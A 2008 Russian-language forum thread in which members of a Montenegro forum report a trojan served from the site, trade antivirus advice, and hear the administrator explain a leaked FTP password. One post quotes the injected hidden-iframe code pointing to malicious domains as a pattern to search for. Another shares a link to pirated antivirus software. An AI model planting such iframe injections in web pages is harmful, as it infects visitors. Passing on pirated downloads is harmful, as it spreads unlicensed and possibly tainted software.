Версия для печати темы
Форум о Черногории _ Разговоры ни о чём :-) _ Троян на форуме!
Автор: Егор 20 Mar 2008, 08:54
Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!
Вот сообщение Касперского:
The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus
Автор: basill 20 Mar 2008, 09:08
Цитата(Егор @ 20 Mar 2008, 17:54)
Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!
Вот сообщение Касперского:
The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus
подтверждаю!!!
Автор: Черногорка 20 Mar 2008, 11:29
Цитата(basill @ 20 Mar 2008, 10:08)
подтверждаю!!!
Точно, на меня пытался напасть!
Автор: Пенсионер 20 Mar 2008, 11:33
Local Settings\Temporary Internet Files\Content.IE5\IM3SWQR2\in[1].htm\JavaScript.0 - инфицирован Trojan.DownLoader.50222
Это Веб сказал....-с последнего сохраненного поста!....делать то что?
Автор: Егор 20 Mar 2008, 12:36
QUOTE(Пенсионер @ 20 Mar 2008, 11:33)
Local Settings\Temporary Internet Files\Content.IE5\IM3SWQR2\in[1].htm\JavaScript.0 - инфицирован Trojan.DownLoader.50222
Это Веб сказал....-с последнего сохраненного поста!....делать то что?
Запустить полную проверку компа антивирусом и уничтожить если что-то обнаружится.
Автор: НастяС 20 Mar 2008, 12:48
Цитата(Егор @ 20 Mar 2008, 12:36)
Запустить полную проверку компа антивирусом и уничтожить если что-то обнаружится.
Спасибо за предупреждение.
Автор: A+A 20 Mar 2008, 17:11
Рекомендую всем соблюдать максимальные меры предосторожности при работе на форму. К сожалению, по техническим причинам мы не сможем решить проблему быстро.
Автор: Алексей Блынский 20 Mar 2008, 17:34
Цитата(A+A @ 20 Mar 2008, 18:11)
Рекомендую всем соблюдать максимальные меры предосторожности при работе на форму. К сожалению, по техническим причинам мы не сможем решить проблему быстро.
В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:
1. Удалить вирусное содержимое со страниц вашего сайта.
2. Обновить свою антивирусную программу и проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователя FTP.
Я так думаю у кого-то из админов, вирус сидел на компе, вот и ушел пароль от FTP.
Удачи в лечении.
на страницах нужно искать примерно такое
----
<body bgColor=#CCCCCC leftMargin=0 topMargin=0 marginheight="0" marginwidth="0"><iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----
или
----
<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe><iframe src=http://dkfjkdkjsl.com/spk2/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----
Еще раз удачи
Автор: saaaab 20 Mar 2008, 21:13
Цитата(Алексей Блынский @ 20 Mar 2008, 17:34)
Я так думаю у кого-то из админов, вирус сидел на компе, вот и ушел пароль от FTP.
Удачи в лечении.
Ага. Два дня назад snoop передал бразды правления, если не ошибаюсь, А+А.
Возможно, конечно, совпадение, но...
Сегодня еле запустил комп, и вижу, что из компа все выгружает троян
Автор: A+A 20 Mar 2008, 22:10
QUOTE(saaaab @ 20 Mar 2008, 21:13)
Ага. Два дня назад snoop передал бразды правления, если не ошибаюсь, А+А.
Возможно, конечно, совпадение, но...
Сегодня еле запустил комп, и вижу, что из компа все выгружает троян
У модераторов нет доступа к прову по FTP.
Автор: Граф Монтенегро 20 Mar 2008, 23:30
Цитата(Егор @ 20 Mar 2008, 08:54)
Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!
Вот сообщение Касперского:
The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus
Да покажите же мне этот вирус наконец. Хобби у меня просто, вирусное (разбираться что и как).
Весь форум облазил, ничто прицепиться не пытается. У меня антивирус AVIRA, если что. Просканил и DrWebом. Причем загружался с LiveCD.
Автор: Егор 21 Mar 2008, 08:43
Да чего его показывать? Вчера вечером опять этот вирус грузился. Да проблем нет, Касперский его убивает у меня и дальше все работает. Не проблема. Зачем антивирус то обновлять если он и так новый и сам обновляется? Что то вы все усложняете. Поставьте антивирус нормальный и непиратский с неворованными ключами и все наладится.
Автор: Александар 21 Mar 2008, 14:20
QUOTE(Граф Монтенегро @ 20 Mar 2008, 23:30)
Да покажите же мне этот вирус наконец. Хобби у меня просто, вирусное (разбираться что и как).
Весь форум облазил, ничто прицепиться не пытается. У меня антивирус AVIRA, если что. Просканил и DrWebом. Причем загружался с LiveCD.
выйдите с форума и войдите. при нажатии ВОЙТИ он и прицепляется.
пару дней назад Касперский его ловил, Dr.Web молчал. а сегодня и Dr.Web нашел этого Trojan.DownLoader.50222
Автор: Граф Монтенегро 21 Mar 2008, 14:34
Цитата(Егор @ 21 Mar 2008, 08:43)
Да чего его показывать? Вчера вечером опять этот вирус грузился. Да проблем нет, Касперский его убивает у меня и дальше все работает. Не проблема. Зачем антивирус то обновлять если он и так новый и сам обновляется? Что то вы все усложняете. Поставьте антивирус нормальный и непиратский с неворованными ключами и все наладится.
Да хобби у меня внутри вирусов копаться самому, а не антивирусом.
А про обновление не понял, я вроде про такое ничего не писал. У меня всегда сами антивирусы обновляются (AVIRA Antivir и Dr. Web). И с родными лицензионными ключиками. Неужто думаете, Граф не может позволить себе купить?
У меня и Windows и Office легальные.
Цитата(Александар @ 21 Mar 2008, 14:20)
выйдите с форума и войдите. при нажатии ВОЙТИ он и прицепляется.
пару дней назад Касперский его ловил, Dr.Web молчал. а сегодня и Dr.Web нашел этого Trojan.DownLoader.50222
Не получилось, Александар. Несколько раз пробовал и процессы мониторил. Ну да пес с ним.
Автор: Алексей Блынский 21 Mar 2008, 15:50
Цитата(Граф Монтенегро @ 21 Mar 2008, 15:34)
Да хобби у меня внутри вирусов копаться самому, а не антивирусом.
Так отключите антивирус, файрволл, заходите на форум и копайтесь на здоровье.
Автор: Пенсионер 23 Mar 2008, 00:00
Троян=пропал!? Нет предупреждающей надписи... ура!? Однако у меня сохранилась странная "функция"=изменять любой свой старый пост!!! Хоть за прошлый год! Хоть вообще стирать! (и все эти изменения-сохраняются в форуме!) (раньше-после сл. поста-функ. "изменить" автоматически закрывалась, а сейчас=все открыто) У вас так же?
Автор: Vernad 23 Mar 2008, 00:17
Пенсионер спасибо за информацию.Удалил один из моих постов.
Автор: Пенсионер 23 Mar 2008, 00:47
Цитата(Vernad @ 23 Mar 2008, 09:17)
Пенсионер спасибо за информацию.Удалил один из моих постов.
Это все хорошо=все мы задним умом с удовольствием что-то исправили бы... но , это разрушит связь! Ответы (пусть даже ругательные)-потеряют смысл.... Админ, прикрой форум и разберись!!!!
Или в Спорт-лото жалобу на вас писать!?
Автор: Vladimir 23 Mar 2008, 01:34
Цитата(Пенсионер @ 23 Mar 2008, 00:47)
Или в Спорт-лото жалобу на вас писать!?
http://rapidshare.com/files/100696191/ESET_NOD32_Antivirus_3.0.645_Business_Edition_2B.rar
Не пропускает. Можно ставить - да простят меня приверженцы только лицензионок. Без закидонов, ставлю, по-возможности, лицензионные версии (в России), меньше проблем, но здесь - труднее. Кстати, при возвращении моих флешок от местных знакомых после "их офисов" - троян, как минимум, "има". Знаю, что есть проблема в "распознавалке" сербско-хорватского" с факса и пр., помогу в FR 9.0 Prof и др. Просто вышлю-выложу для ЧГ коммьюнити...
Автор: Кумборец 23 Mar 2008, 17:22
Цитата(Пенсионер @ 23 Mar 2008, 00:00)
Троян=пропал!? Нет предупреждающей надписи... ура!?
...
Увы нам! Никуда троян не пропал. Визжит дурным голосом, когда Касперский его выкусывает
Автор: Vladimir 23 Mar 2008, 18:39
Цитата(Кумборец @ 23 Mar 2008, 17:22)
Увы нам! Никуда троян не пропал. Визжит дурным голосом, когда Касперский его выкусывает
У меня не визжит, но "выкусывает". Замечу, только в Экслорере, в Опере ничего не определяется.
Автор: Dimus 26 Mar 2008, 02:06
Проблемы с трояном действительно были. Исправили
Интересна прична. Кто-то из администраторов "потерял" логин/пароль и таким образом злоумышленники получили доступ к форуму, без его взлома. Скрипты форума были модифицированы, был добавлен код, чтобы тот кто запрашивает форум ходил еще на другой сайт за трояном.
В настоящий момент пароли ФТП нами изменены. Администраторам и модераторам срочно необходимо самим изменить свои личные пароли.
Внимание модераторам!
Администрация планирует структурную модернизацию форума. Пожалуйста свяжитесь с Дмитрием (Dimus) dm(at)coline.ru для обсуждения новой структуры разделов и правил форума.